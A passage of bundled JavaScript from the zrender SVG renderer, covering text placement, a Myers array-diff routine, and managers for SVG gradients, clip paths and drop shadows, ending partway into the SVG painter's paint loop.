}\n        // Remove unused tspan elements\n        if (tspanOriginLen > nTextLines) {\n            for (; idx < tspanOriginLen; idx++) {\n                textSvgEl.removeChild(tspanList[idx]);\n            }\n            tspanList.length = nTextLines;\n        }\n    }\n};\n\nfunction setTextTransform(textSvgEl, needTransformTextByHostEl, elTransform, style, hostRect, baseX, baseY) {\n    identity(_tmpTextTransform);\n\n    if (needTransformTextByHostEl && elTransform) {\n        copy$1(_tmpTextTransform, elTransform);\n    }\n\n    // textRotation only apply in RectText.\n    var textRotation = style.textRotation;\n    if (hostRect && textRotation) {\n        var origin = style.textOrigin;\n        if (origin === 'center') {\n            baseX = hostRect.width / 2 + hostRect.x;\n            baseY = hostRect.height / 2 + hostRect.y;\n        }\n        else if (origin) {\n            baseX = origin[0] + hostRect.x;\n            baseY = origin[1] + hostRect.y;\n        }\n\n        _tmpTextTransform[4] -= baseX;\n        _tmpTextTransform[5] -= baseY;\n        // Positive: anticlockwise\n        rotate(_tmpTextTransform, _tmpTextTransform, textRotation);\n        _tmpTextTransform[4] += baseX;\n        _tmpTextTransform[5] += baseY;\n    }\n    // See the definition in `Style.js#textOrigin`, the default\n    // origin is from the result of `getBoxPosition`.\n\n    setTransform(textSvgEl, _tmpTextTransform);\n}\n\n// FIXME merge the same code with `helper/text.js#getTextXForPadding`;\nfunction getTextXForPadding$1(x, textAlign, textPadding) {\n    return textAlign === 'right'\n        ? (x - textPadding[1])\n        : textAlign === 'center'\n        ? (x + textPadding[3] / 2 - textPadding[1] / 2)\n        : (x + textPadding[3]);\n}\n\nfunction updateTextLocation(tspan, textAlign, x, y) {\n    // Consider different font display differently in vertial align, we always\n    // set vertialAlign as 'middle', and use 'y' to locate text vertically.\n    attr(tspan, 'dominant-baseline', 'middle');\n    attr(tspan, 'text-anchor', TEXT_ALIGN_TO_ANCHRO[textAlign]);\n    attr(tspan, 'x', x);\n    attr(tspan, 'y', y);\n}\n\nfunction removeOldTextNode(el) {\n    if (el && el.__textSvgEl) {\n        // textSvgEl may has no parentNode if el has been removed temporary.\n        if (el.__textSvgEl.parentNode) {\n            el.__textSvgEl.parentNode.removeChild(el.__textSvgEl);\n        }\n        el.__textSvgEl = null;\n        el.__tspanList = [];\n        el.__text = null;\n    }\n}\n\nsvgText.drawRectText = svgTextDrawRectText;\n\nsvgText.brush = function (el) {\n    var style = el.style;\n    if (style.text != null) {\n        svgTextDrawRectText(el, false);\n    }\n    else {\n        removeOldTextNode(el);\n    }\n};\n\n// Myers' Diff Algorithm\n// Modified from https://github.com/kpdecker/jsdiff/blob/master/src/diff/base.js\n\nfunction Diff() {}\n\nDiff.prototype = {\n    diff: function (oldArr, newArr, equals) {\n        if (!equals) {\n            equals = function (a, b) {\n                return a === b;\n            };\n        }\n        this.equals = equals;\n\n        var self = this;\n\n        oldArr = oldArr.slice();\n        newArr = newArr.slice();\n        // Allow subclasses to massage the input prior to running\n        var newLen = newArr.length;\n        var oldLen = oldArr.length;\n        var editLength = 1;\n        var maxEditLength = newLen + oldLen;\n        var bestPath = [{ newPos: -1, components: [] }];\n\n        // Seed editLength = 0, i.e. the content starts with the same values\n        var oldPos = this.extractCommon(bestPath[0], newArr, oldArr, 0);\n        if (bestPath[0].newPos + 1 >= newLen && oldPos + 1 >= oldLen) {\n            var indices = [];\n            for (var i = 0; i < newArr.length; i++) {\n                indices.push(i);\n            }\n            // Identity per the equality and tokenizer\n            return [{\n                indices: indices, count: newArr.length\n            }];\n        }\n\n        // Main worker method. checks all permutations of a given edit length for acceptance.\n        function execEditLength() {\n            for (var diagonalPath = -1 * editLength; diagonalPath <= editLength; diagonalPath += 2) {\n                var basePath;\n                var addPath = bestPath[diagonalPath - 1];\n                var removePath = bestPath[diagonalPath + 1];\n                var oldPos = (removePath ? removePath.newPos : 0) - diagonalPath;\n                if (addPath) {\n                    // No one else is going to attempt to use this value, clear it\n                    bestPath[diagonalPath - 1] = undefined;\n                }\n\n                var canAdd = addPath && addPath.newPos + 1 < newLen;\n                var canRemove = removePath && 0 <= oldPos && oldPos < oldLen;\n                if (!canAdd && !canRemove) {\n                    // If this path is a terminal then prune\n                    bestPath[diagonalPath] = undefined;\n                    continue;\n                }\n\n                // Select the diagonal that we want to branch from. We select the prior\n                // path whose position in the new string is the farthest from the origin\n                // and does not pass the bounds of the diff graph\n                if (!canAdd || (canRemove && addPath.newPos < removePath.newPos)) {\n                    basePath = clonePath(removePath);\n                    self.pushComponent(basePath.components, undefined, true);\n                }\n                else {\n                    basePath = addPath;   // No need to clone, we've pulled it from the list\n                    basePath.newPos++;\n                    self.pushComponent(basePath.components, true, undefined);\n                }\n\n                oldPos = self.extractCommon(basePath, newArr, oldArr, diagonalPath);\n\n                // If we have hit the end of both strings, then we are done\n                if (basePath.newPos + 1 >= newLen && oldPos + 1 >= oldLen) {\n                    return buildValues(self, basePath.components, newArr, oldArr);\n                }\n                else {\n                    // Otherwise track this path as a potential candidate and continue.\n                    bestPath[diagonalPath] = basePath;\n                }\n            }\n\n            editLength++;\n        }\n\n        while (editLength <= maxEditLength) {\n            var ret = execEditLength();\n            if (ret) {\n                return ret;\n            }\n        }\n    },\n\n    pushComponent: function (components, added, removed) {\n        var last = components[components.length - 1];\n        if (last && last.added === added && last.removed === removed) {\n            // We need to clone here as the component clone operation is just\n            // as shallow array clone\n            components[components.length - 1] = {count: last.count + 1, added: added, removed: removed };\n        }\n        else {\n            components.push({count: 1, added: added, removed: removed });\n        }\n    },\n    extractCommon: function (basePath, newArr, oldArr, diagonalPath) {\n        var newLen = newArr.length;\n        var oldLen = oldArr.length;\n        var newPos = basePath.newPos;\n        var oldPos = newPos - diagonalPath;\n        var commonCount = 0;\n\n        while (newPos + 1 < newLen && oldPos + 1 < oldLen && this.equals(newArr[newPos + 1], oldArr[oldPos + 1])) {\n            newPos++;\n            oldPos++;\n            commonCount++;\n        }\n\n        if (commonCount) {\n            basePath.components.push({count: commonCount});\n        }\n\n        basePath.newPos = newPos;\n        return oldPos;\n    },\n    tokenize: function (value) {\n        return value.slice();\n    },\n    join: function (value) {\n        return value.slice();\n    }\n};\n\nfunction buildValues(diff, components, newArr, oldArr) {\n    var componentPos = 0;\n    var componentLen = components.length;\n    var newPos = 0;\n    var oldPos = 0;\n\n    for (; componentPos < componentLen; componentPos++) {\n        var component = components[componentPos];\n        if (!component.removed) {\n            var indices = [];\n            for (var i = newPos; i < newPos + component.count; i++) {\n                indices.push(i);\n            }\n            component.indices = indices;\n            newPos += component.count;\n            // Common case\n            if (!component.added) {\n                oldPos += component.count;\n            }\n        }\n        else {\n            var indices = [];\n            for (var i = oldPos; i < oldPos + component.count; i++) {\n                indices.push(i);\n            }\n            component.indices = indices;\n            oldPos += component.count;\n        }\n    }\n\n    return components;\n}\n\nfunction clonePath(path) {\n    return { newPos: path.newPos, components: path.components.slice(0) };\n}\n\nvar arrayDiff = new Diff();\n\nvar arrayDiff$1 = function (oldArr, newArr, callback) {\n    return arrayDiff.diff(oldArr, newArr, callback);\n};\n\n/**\n * @file Manages elements that can be defined in <defs> in SVG,\n *       e.g., gradients, clip path, etc.\n * @author Zhang Wenli\n */\n\nvar MARK_UNUSED = '0';\nvar MARK_USED = '1';\n\n/**\n * Manages elements that can be defined in <defs> in SVG,\n * e.g., gradients, clip path, etc.\n *\n * @class\n * @param {number}          zrId      zrender instance id\n * @param {SVGElement}      svgRoot   root of SVG document\n * @param {string|string[]} tagNames  possible tag names\n * @param {string}          markLabel label name to make if the element\n *                                    is used\n */\nfunction Definable(\n    zrId,\n    svgRoot,\n    tagNames,\n    markLabel,\n    domName\n) {\n    this._zrId = zrId;\n    this._svgRoot = svgRoot;\n    this._tagNames = typeof tagNames === 'string' ? [tagNames] : tagNames;\n    this._markLabel = markLabel;\n    this._domName = domName || '_dom';\n\n    this.nextId = 0;\n}\n\n\nDefinable.prototype.createElement = createElement;\n\n\n/**\n * Get the <defs> tag for svgRoot; optionally creates one if not exists.\n *\n * @param {boolean} isForceCreating if need to create when not exists\n * @return {SVGDefsElement} SVG <defs> element, null if it doesn't\n * exist and isForceCreating is false\n */\nDefinable.prototype.getDefs = function (isForceCreating) {\n    var svgRoot = this._svgRoot;\n    var defs = this._svgRoot.getElementsByTagName('defs');\n    if (defs.length === 0) {\n        // Not exist\n        if (isForceCreating) {\n            defs = svgRoot.insertBefore(\n                this.createElement('defs'), // Create new tag\n                svgRoot.firstChild // Insert in the front of svg\n            );\n            if (!defs.contains) {\n                // IE doesn't support contains method\n                defs.contains = function (el) {\n                    var children = defs.children;\n                    if (!children) {\n                        return false;\n                    }\n                    for (var i = children.length - 1; i >= 0; --i) {\n                        if (children[i] === el) {\n                            return true;\n                        }\n                    }\n                    return false;\n                };\n            }\n            return defs;\n        }\n        else {\n            return null;\n        }\n    }\n    else {\n        return defs[0];\n    }\n};\n\n\n/**\n * Update DOM element if necessary.\n *\n * @param {Object|string} element style element. e.g., for gradient,\n *                                it may be '#ccc' or {type: 'linear', ...}\n * @param {Function|undefined} onUpdate update callback\n */\nDefinable.prototype.update = function (element, onUpdate) {\n    if (!element) {\n        return;\n    }\n\n    var defs = this.getDefs(false);\n    if (element[this._domName] && defs.contains(element[this._domName])) {\n        // Update DOM\n        if (typeof onUpdate === 'function') {\n            onUpdate(element);\n        }\n    }\n    else {\n        // No previous dom, create new\n        var dom = this.add(element);\n        if (dom) {\n            element[this._domName] = dom;\n        }\n    }\n};\n\n\n/**\n * Add gradient dom to defs\n *\n * @param {SVGElement} dom DOM to be added to <defs>\n */\nDefinable.prototype.addDom = function (dom) {\n    var defs = this.getDefs(true);\n    defs.appendChild(dom);\n};\n\n\n/**\n * Remove DOM of a given element.\n *\n * @param {SVGElement} element element to remove dom\n */\nDefinable.prototype.removeDom = function (element) {\n    var defs = this.getDefs(false);\n    if (defs && element[this._domName]) {\n        defs.removeChild(element[this._domName]);\n        element[this._domName] = null;\n    }\n};\n\n\n/**\n * Get DOMs of this element.\n *\n * @return {HTMLDomElement} doms of this defineable elements in <defs>\n */\nDefinable.prototype.getDoms = function () {\n    var defs = this.getDefs(false);\n    if (!defs) {\n        // No dom when defs is not defined\n        return [];\n    }\n\n    var doms = [];\n    each$1(this._tagNames, function (tagName) {\n        var tags = defs.getElementsByTagName(tagName);\n        // Note that tags is HTMLCollection, which is array-like\n        // rather than real array.\n        // So `doms.concat(tags)` add tags as one object.\n        doms = doms.concat([].slice.call(tags));\n    });\n\n    return doms;\n};\n\n\n/**\n * Mark DOMs to be unused before painting, and clear unused ones at the end\n * of the painting.\n */\nDefinable.prototype.markAllUnused = function () {\n    var doms = this.getDoms();\n    var that = this;\n    each$1(doms, function (dom) {\n        dom[that._markLabel] = MARK_UNUSED;\n    });\n};\n\n\n/**\n * Mark a single DOM to be used.\n *\n * @param {SVGElement} dom DOM to mark\n */\nDefinable.prototype.markUsed = function (dom) {\n    if (dom) {\n        dom[this._markLabel] = MARK_USED;\n    }\n};\n\n\n/**\n * Remove unused DOMs defined in <defs>\n */\nDefinable.prototype.removeUnused = function () {\n    var defs = this.getDefs(false);\n    if (!defs) {\n        // Nothing to remove\n        return;\n    }\n\n    var doms = this.getDoms();\n    var that = this;\n    each$1(doms, function (dom) {\n        if (dom[that._markLabel] !== MARK_USED) {\n            // Remove gradient\n            defs.removeChild(dom);\n        }\n    });\n};\n\n\n/**\n * Get SVG proxy.\n *\n * @param {Displayable} displayable displayable element\n * @return {Path|Image|Text} svg proxy of given element\n */\nDefinable.prototype.getSvgProxy = function (displayable) {\n    if (displayable instanceof Path) {\n        return svgPath;\n    }\n    else if (displayable instanceof ZImage) {\n        return svgImage;\n    }\n    else if (displayable instanceof Text) {\n        return svgText;\n    }\n    else {\n        return svgPath;\n    }\n};\n\n\n/**\n * Get text SVG element.\n *\n * @param {Displayable} displayable displayable element\n * @return {SVGElement} SVG element of text\n */\nDefinable.prototype.getTextSvgElement = function (displayable) {\n    return displayable.__textSvgEl;\n};\n\n\n/**\n * Get SVG element.\n *\n * @param {Displayable} displayable displayable element\n * @return {SVGElement} SVG element\n */\nDefinable.prototype.getSvgElement = function (displayable) {\n    return displayable.__svgEl;\n};\n\n/**\n * @file Manages SVG gradient elements.\n * @author Zhang Wenli\n */\n\n/**\n * Manages SVG gradient elements.\n *\n * @class\n * @extends Definable\n * @param   {number}     zrId    zrender instance id\n * @param   {SVGElement} svgRoot root of SVG document\n */\nfunction GradientManager(zrId, svgRoot) {\n    Definable.call(\n        this,\n        zrId,\n        svgRoot,\n        ['linearGradient', 'radialGradient'],\n        '__gradient_in_use__'\n    );\n}\n\n\ninherits(GradientManager, Definable);\n\n\n/**\n * Create new gradient DOM for fill or stroke if not exist,\n * but will not update gradient if exists.\n *\n * @param {SvgElement}  svgElement   SVG element to paint\n * @param {Displayable} displayable  zrender displayable element\n */\nGradientManager.prototype.addWithoutUpdate = function (\n    svgElement,\n    displayable\n) {\n    if (displayable && displayable.style) {\n        var that = this;\n        each$1(['fill', 'stroke'], function (fillOrStroke) {\n            if (displayable.style[fillOrStroke]\n                && (displayable.style[fillOrStroke].type === 'linear'\n                || displayable.style[fillOrStroke].type === 'radial')\n            ) {\n                var gradient = displayable.style[fillOrStroke];\n                var defs = that.getDefs(true);\n\n                // Create dom in <defs> if not exists\n                var dom;\n                if (gradient._dom) {\n                    // Gradient exists\n                    dom = gradient._dom;\n                    if (!defs.contains(gradient._dom)) {\n                        // _dom is no longer in defs, recreate\n                        that.addDom(dom);\n                    }\n                }\n                else {\n                    // New dom\n                    dom = that.add(gradient);\n                }\n\n                that.markUsed(displayable);\n\n                var id = dom.getAttribute('id');\n                svgElement.setAttribute(fillOrStroke, 'url(#' + id + ')');\n            }\n        });\n    }\n};\n\n\n/**\n * Add a new gradient tag in <defs>\n *\n * @param   {Gradient} gradient zr gradient instance\n * @return {SVGLinearGradientElement | SVGRadialGradientElement}\n *                            created DOM\n */\nGradientManager.prototype.add = function (gradient) {\n    var dom;\n    if (gradient.type === 'linear') {\n        dom = this.createElement('linearGradient');\n    }\n    else if (gradient.type === 'radial') {\n        dom = this.createElement('radialGradient');\n    }\n    else {\n        logError$1('Illegal gradient type.');\n        return null;\n    }\n\n    // Set dom id with gradient id, since each gradient instance\n    // will have no more than one dom element.\n    // id may exists before for those dirty elements, in which case\n    // id should remain the same, and other attributes should be\n    // updated.\n    gradient.id = gradient.id || this.nextId++;\n    dom.setAttribute('id', 'zr' + this._zrId\n        + '-gradient-' + gradient.id);\n\n    this.updateDom(gradient, dom);\n    this.addDom(dom);\n\n    return dom;\n};\n\n\n/**\n * Update gradient.\n *\n * @param {Gradient} gradient zr gradient instance\n */\nGradientManager.prototype.update = function (gradient) {\n    var that = this;\n    Definable.prototype.update.call(this, gradient, function () {\n        var type = gradient.type;\n        var tagName = gradient._dom.tagName;\n        if (type === 'linear' && tagName === 'linearGradient'\n            || type === 'radial' && tagName === 'radialGradient'\n        ) {\n            // Gradient type is not changed, update gradient\n            that.updateDom(gradient, gradient._dom);\n        }\n        else {\n            // Remove and re-create if type is changed\n            that.removeDom(gradient);\n            that.add(gradient);\n        }\n    });\n};\n\n\n/**\n * Update gradient dom\n *\n * @param {Gradient} gradient zr gradient instance\n * @param {SVGLinearGradientElement | SVGRadialGradientElement} dom\n *                            DOM to update\n */\nGradientManager.prototype.updateDom = function (gradient, dom) {\n    if (gradient.type === 'linear') {\n        dom.setAttribute('x1', gradient.x);\n        dom.setAttribute('y1', gradient.y);\n        dom.setAttribute('x2', gradient.x2);\n        dom.setAttribute('y2', gradient.y2);\n    }\n    else if (gradient.type === 'radial') {\n        dom.setAttribute('cx', gradient.x);\n        dom.setAttribute('cy', gradient.y);\n        dom.setAttribute('r', gradient.r);\n    }\n    else {\n        logError$1('Illegal gradient type.');\n        return;\n    }\n\n    if (gradient.global) {\n        // x1, x2, y1, y2 in range of 0 to canvas width or height\n        dom.setAttribute('gradientUnits', 'userSpaceOnUse');\n    }\n    else {\n        // x1, x2, y1, y2 in range of 0 to 1\n        dom.setAttribute('gradientUnits', 'objectBoundingBox');\n    }\n\n    // Remove color stops if exists\n    dom.innerHTML = '';\n\n    // Add color stops\n    var colors = gradient.colorStops;\n    for (var i = 0, len = colors.length; i < len; ++i) {\n        var stop = this.createElement('stop');\n        stop.setAttribute('offset', colors[i].offset * 100 + '%');\n\n        var color = colors[i].color;\n        if (color.indexOf('rgba' > -1)) {\n            // Fix Safari bug that stop-color not recognizing alpha #9014\n            var opacity = parse(color)[3];\n            var hex = toHex(color);\n\n            // stop-color cannot be color, since:\n            // The opacity value used for the gradient calculation is the\n            // *product* of the value of stop-opacity and the opacity of the\n            // value of stop-color.\n            // See https://www.w3.org/TR/SVG2/pservers.html#StopOpacityProperty\n            stop.setAttribute('stop-color', '#' + hex);\n            stop.setAttribute('stop-opacity', opacity);\n        }\n        else {\n            stop.setAttribute('stop-color', colors[i].color);\n        }\n\n        dom.appendChild(stop);\n    }\n\n    // Store dom element in gradient, to avoid creating multiple\n    // dom instances for the same gradient element\n    gradient._dom = dom;\n};\n\n/**\n * Mark a single gradient to be used\n *\n * @param {Displayable} displayable displayable element\n */\nGradientManager.prototype.markUsed = function (displayable) {\n    if (displayable.style) {\n        var gradient = displayable.style.fill;\n        if (gradient && gradient._dom) {\n            Definable.prototype.markUsed.call(this, gradient._dom);\n        }\n\n        gradient = displayable.style.stroke;\n        if (gradient && gradient._dom) {\n            Definable.prototype.markUsed.call(this, gradient._dom);\n        }\n    }\n};\n\n/**\n * @file Manages SVG clipPath elements.\n * @author Zhang Wenli\n */\n\n/**\n * Manages SVG clipPath elements.\n *\n * @class\n * @extends Definable\n * @param   {number}     zrId    zrender instance id\n * @param   {SVGElement} svgRoot root of SVG document\n */\nfunction ClippathManager(zrId, svgRoot) {\n    Definable.call(this, zrId, svgRoot, 'clipPath', '__clippath_in_use__');\n}\n\n\ninherits(ClippathManager, Definable);\n\n\n/**\n * Update clipPath.\n *\n * @param {Displayable} displayable displayable element\n */\nClippathManager.prototype.update = function (displayable) {\n    var svgEl = this.getSvgElement(displayable);\n    if (svgEl) {\n        this.updateDom(svgEl, displayable.__clipPaths, false);\n    }\n\n    var textEl = this.getTextSvgElement(displayable);\n    if (textEl) {\n        // Make another clipPath for text, since it's transform\n        // matrix is not the same with svgElement\n        this.updateDom(textEl, displayable.__clipPaths, true);\n    }\n\n    this.markUsed(displayable);\n};\n\n\n/**\n * Create an SVGElement of displayable and create a <clipPath> of its\n * clipPath\n *\n * @param {Displayable} parentEl  parent element\n * @param {ClipPath[]}  clipPaths clipPaths of parent element\n * @param {boolean}     isText    if parent element is Text\n */\nClippathManager.prototype.updateDom = function (\n    parentEl,\n    clipPaths,\n    isText\n) {\n    if (clipPaths && clipPaths.length > 0) {\n        // Has clipPath, create <clipPath> with the first clipPath\n        var defs = this.getDefs(true);\n        var clipPath = clipPaths[0];\n        var clipPathEl;\n        var id;\n\n        var dom = isText ? '_textDom' : '_dom';\n\n        if (clipPath[dom]) {\n            // Use a dom that is already in <defs>\n            id = clipPath[dom].getAttribute('id');\n            clipPathEl = clipPath[dom];\n\n            // Use a dom that is already in <defs>\n            if (!defs.contains(clipPathEl)) {\n                // This happens when set old clipPath that has\n                // been previously removed\n                defs.appendChild(clipPathEl);\n            }\n        }\n        else {\n            // New <clipPath>\n            id = 'zr' + this._zrId + '-clip-' + this.nextId;\n            ++this.nextId;\n            clipPathEl = this.createElement('clipPath');\n            clipPathEl.setAttribute('id', id);\n            defs.appendChild(clipPathEl);\n\n            clipPath[dom] = clipPathEl;\n        }\n\n        // Build path and add to <clipPath>\n        var svgProxy = this.getSvgProxy(clipPath);\n        if (clipPath.transform\n            && clipPath.parent.invTransform\n            && !isText\n        ) {\n            /**\n             * If a clipPath has a parent with transform, the transform\n             * of parent should not be considered when setting transform\n             * of clipPath. So we need to transform back from parent's\n             * transform, which is done by multiplying parent's inverse\n             * transform.\n             */\n            // Store old transform\n            var transform = Array.prototype.slice.call(\n                clipPath.transform\n            );\n\n            // Transform back from parent, and brush path\n            mul$1(\n                clipPath.transform,\n                clipPath.parent.invTransform,\n                clipPath.transform\n            );\n            svgProxy.brush(clipPath);\n\n            // Set back transform of clipPath\n            clipPath.transform = transform;\n        }\n        else {\n            svgProxy.brush(clipPath);\n        }\n\n        var pathEl = this.getSvgElement(clipPath);\n\n        clipPathEl.innerHTML = '';\n        /**\n         * Use `cloneNode()` here to appendChild to multiple parents,\n         * which may happend when Text and other shapes are using the same\n         * clipPath. Since Text will create an extra clipPath DOM due to\n         * different transform rules.\n         */\n        clipPathEl.appendChild(pathEl.cloneNode());\n\n        parentEl.setAttribute('clip-path', 'url(#' + id + ')');\n\n        if (clipPaths.length > 1) {\n            // Make the other clipPaths recursively\n            this.updateDom(clipPathEl, clipPaths.slice(1), isText);\n        }\n    }\n    else {\n        // No clipPath\n        if (parentEl) {\n            parentEl.setAttribute('clip-path', 'none');\n        }\n    }\n};\n\n/**\n * Mark a single clipPath to be used\n *\n * @param {Displayable} displayable displayable element\n */\nClippathManager.prototype.markUsed = function (displayable) {\n    var that = this;\n    // displayable.__clipPaths can only be `null`/`undefined` or an non-empty array.\n    if (displayable.__clipPaths) {\n        each$1(displayable.__clipPaths, function (clipPath) {\n            if (clipPath._dom) {\n                Definable.prototype.markUsed.call(that, clipPath._dom);\n            }\n            if (clipPath._textDom) {\n                Definable.prototype.markUsed.call(that, clipPath._textDom);\n            }\n        });\n    }\n};\n\n/**\n * @file Manages SVG shadow elements.\n * @author Zhang Wenli\n */\n\n/**\n * Manages SVG shadow elements.\n *\n * @class\n * @extends Definable\n * @param   {number}     zrId    zrender instance id\n * @param   {SVGElement} svgRoot root of SVG document\n */\nfunction ShadowManager(zrId, svgRoot) {\n    Definable.call(\n        this,\n        zrId,\n        svgRoot,\n        ['filter'],\n        '__filter_in_use__',\n        '_shadowDom'\n    );\n}\n\n\ninherits(ShadowManager, Definable);\n\n\n/**\n * Create new shadow DOM for fill or stroke if not exist,\n * but will not update shadow if exists.\n *\n * @param {SvgElement}  svgElement   SVG element to paint\n * @param {Displayable} displayable  zrender displayable element\n */\nShadowManager.prototype.addWithoutUpdate = function (\n    svgElement,\n    displayable\n) {\n    if (displayable && hasShadow(displayable.style)) {\n\n        // Create dom in <defs> if not exists\n        var dom;\n        if (displayable._shadowDom) {\n            // Gradient exists\n            dom = displayable._shadowDom;\n\n            var defs = this.getDefs(true);\n            if (!defs.contains(displayable._shadowDom)) {\n                // _shadowDom is no longer in defs, recreate\n                this.addDom(dom);\n            }\n        }\n        else {\n            // New dom\n            dom = this.add(displayable);\n        }\n\n        this.markUsed(displayable);\n\n        var id = dom.getAttribute('id');\n        svgElement.style.filter = 'url(#' + id + ')';\n    }\n};\n\n\n/**\n * Add a new shadow tag in <defs>\n *\n * @param {Displayable} displayable  zrender displayable element\n * @return {SVGFilterElement} created DOM\n */\nShadowManager.prototype.add = function (displayable) {\n    var dom = this.createElement('filter');\n\n    // Set dom id with shadow id, since each shadow instance\n    // will have no more than one dom element.\n    // id may exists before for those dirty elements, in which case\n    // id should remain the same, and other attributes should be\n    // updated.\n    displayable._shadowDomId = displayable._shadowDomId || this.nextId++;\n    dom.setAttribute('id', 'zr' + this._zrId\n        + '-shadow-' + displayable._shadowDomId);\n\n    this.updateDom(displayable, dom);\n    this.addDom(dom);\n\n    return dom;\n};\n\n\n/**\n * Update shadow.\n *\n * @param {Displayable} displayable  zrender displayable element\n */\nShadowManager.prototype.update = function (svgElement, displayable) {\n    var style = displayable.style;\n    if (hasShadow(style)) {\n        var that = this;\n        Definable.prototype.update.call(this, displayable, function () {\n            that.updateDom(displayable, displayable._shadowDom);\n        });\n    }\n    else {\n        // Remove shadow\n        this.remove(svgElement, displayable);\n    }\n};\n\n\n/**\n * Remove DOM and clear parent filter\n */\nShadowManager.prototype.remove = function (svgElement, displayable) {\n    if (displayable._shadowDomId != null) {\n        this.removeDom(svgElement);\n        svgElement.style.filter = '';\n    }\n};\n\n\n/**\n * Update shadow dom\n *\n * @param {Displayable} displayable  zrender displayable element\n * @param {SVGFilterElement} dom DOM to update\n */\nShadowManager.prototype.updateDom = function (displayable, dom) {\n    var domChild = dom.getElementsByTagName('feDropShadow');\n    if (domChild.length === 0) {\n        domChild = this.createElement('feDropShadow');\n    }\n    else {\n        domChild = domChild[0];\n    }\n\n    var style = displayable.style;\n    var scaleX = displayable.scale ? (displayable.scale[0] || 1) : 1;\n    var scaleY = displayable.scale ? (displayable.scale[1] || 1) : 1;\n\n    // TODO: textBoxShadowBlur is not supported yet\n    var offsetX;\n    var offsetY;\n    var blur;\n    var color;\n    if (style.shadowBlur || style.shadowOffsetX || style.shadowOffsetY) {\n        offsetX = style.shadowOffsetX || 0;\n        offsetY = style.shadowOffsetY || 0;\n        blur = style.shadowBlur;\n        color = style.shadowColor;\n    }\n    else if (style.textShadowBlur) {\n        offsetX = style.textShadowOffsetX || 0;\n        offsetY = style.textShadowOffsetY || 0;\n        blur = style.textShadowBlur;\n        color = style.textShadowColor;\n    }\n    else {\n        // Remove shadow\n        this.removeDom(dom, style);\n        return;\n    }\n\n    domChild.setAttribute('dx', offsetX / scaleX);\n    domChild.setAttribute('dy', offsetY / scaleY);\n    domChild.setAttribute('flood-color', color);\n\n    // Divide by two here so that it looks the same as in canvas\n    // See: https://html.spec.whatwg.org/multipage/canvas.html#dom-context-2d-shadowblur\n    var stdDx = blur / 2 / scaleX;\n    var stdDy = blur / 2 / scaleY;\n    var stdDeviation = stdDx + ' ' + stdDy;\n    domChild.setAttribute('stdDeviation', stdDeviation);\n\n    // Fix filter clipping problem\n    dom.setAttribute('x', '-100%');\n    dom.setAttribute('y', '-100%');\n    dom.setAttribute('width', Math.ceil(blur / 2 * 200) + '%');\n    dom.setAttribute('height', Math.ceil(blur / 2 * 200) + '%');\n\n    dom.appendChild(domChild);\n\n    // Store dom element in shadow, to avoid creating multiple\n    // dom instances for the same shadow element\n    displayable._shadowDom = dom;\n};\n\n/**\n * Mark a single shadow to be used\n *\n * @param {Displayable} displayable displayable element\n */\nShadowManager.prototype.markUsed = function (displayable) {\n    if (displayable._shadowDom) {\n        Definable.prototype.markUsed.call(this, displayable._shadowDom);\n    }\n};\n\nfunction hasShadow(style) {\n    // TODO: textBoxShadowBlur is not supported yet\n    return style\n        && (style.shadowBlur || style.shadowOffsetX || style.shadowOffsetY\n            || style.textShadowBlur || style.textShadowOffsetX\n            || style.textShadowOffsetY);\n}\n\n/**\n * SVG Painter\n * @module zrender/svg/Painter\n */\n\nfunction parseInt10$2(val) {\n    return parseInt(val, 10);\n}\n\nfunction getSvgProxy(el) {\n    if (el instanceof Path) {\n        return svgPath;\n    }\n    else if (el instanceof ZImage) {\n        return svgImage;\n    }\n    else if (el instanceof Text) {\n        return svgText;\n    }\n    else {\n        return svgPath;\n    }\n}\n\nfunction checkParentAvailable(parent, child) {\n    return child && parent && child.parentNode !== parent;\n}\n\nfunction insertAfter(parent, child, prevSibling) {\n    if (checkParentAvailable(parent, child) && prevSibling) {\n        var nextSibling = prevSibling.nextSibling;\n        nextSibling ? parent.insertBefore(child, nextSibling)\n            : parent.appendChild(child);\n    }\n}\n\nfunction prepend(parent, child) {\n    if (checkParentAvailable(parent, child)) {\n        var firstChild = parent.firstChild;\n        firstChild ? parent.insertBefore(child, firstChild)\n            : parent.appendChild(child);\n    }\n}\n\n// function append(parent, child) {\n//     if (checkParentAvailable(parent, child)) {\n//         parent.appendChild(child);\n//     }\n// }\n\nfunction remove$1(parent, child) {\n    if (child && parent && child.parentNode === parent) {\n        parent.removeChild(child);\n    }\n}\n\nfunction getTextSvgElement(displayable) {\n    return displayable.__textSvgEl;\n}\n\nfunction getSvgElement(displayable) {\n    return displayable.__svgEl;\n}\n\n/**\n * @alias module:zrender/svg/Painter\n * @constructor\n * @param {HTMLElement} root 绘图容器\n * @param {module:zrender/Storage} storage\n * @param {Object} opts\n */\nvar SVGPainter = function (root, storage, opts, zrId) {\n\n    this.root = root;\n    this.storage = storage;\n    this._opts = opts = extend({}, opts || {});\n\n    var svgRoot = createElement('svg');\n    svgRoot.setAttribute('xmlns', 'http://www.w3.org/2000/svg');\n    svgRoot.setAttribute('version', '1.1');\n    svgRoot.setAttribute('baseProfile', 'full');\n    svgRoot.style.cssText = 'user-select:none;position:absolute;left:0;top:0;';\n\n    this.gradientManager = new GradientManager(zrId, svgRoot);\n    this.clipPathManager = new ClippathManager(zrId, svgRoot);\n    this.shadowManager = new ShadowManager(zrId, svgRoot);\n\n    var viewport = document.createElement('div');\n    viewport.style.cssText = 'overflow:hidden;position:relative';\n\n    this._svgRoot = svgRoot;\n    this._viewport = viewport;\n\n    root.appendChild(viewport);\n    viewport.appendChild(svgRoot);\n\n    this.resize(opts.width, opts.height);\n\n    this._visibleList = [];\n};\n\nSVGPainter.prototype = {\n\n    constructor: SVGPainter,\n\n    getType: function () {\n        return 'svg';\n    },\n\n    getViewportRoot: function () {\n        return this._viewport;\n    },\n\n    getViewportRootOffset: function () {\n        var viewportRoot = this.getViewportRoot();\n        if (viewportRoot) {\n            return {\n                offsetLeft: viewportRoot.offsetLeft || 0,\n                offsetTop: viewportRoot.offsetTop || 0\n            };\n        }\n    },\n\n    refresh: function () {\n\n        var list = this.storage.getDisplayList(true);\n\n        this._paintList(list);\n    },\n\n    setBackgroundColor: function (backgroundColor) {\n        // TODO gradient\n        this._viewport.style.background = backgroundColor;\n    },\n\n    _paintList: function (list) {\n        this.gradientManager.markAllUnused();\n        this.clipPathManager.markAllUnused();\n        this.shadowManager.markAllUnused();\n\n        var svgRoot = this._svgRoot;\n        var visibleList = this._visibleList;\n        var listLen = list.length;\n\n        var newVisibleList = [];\n        var i;\n        for (i = 0; i < listLen; i++) {\n            var 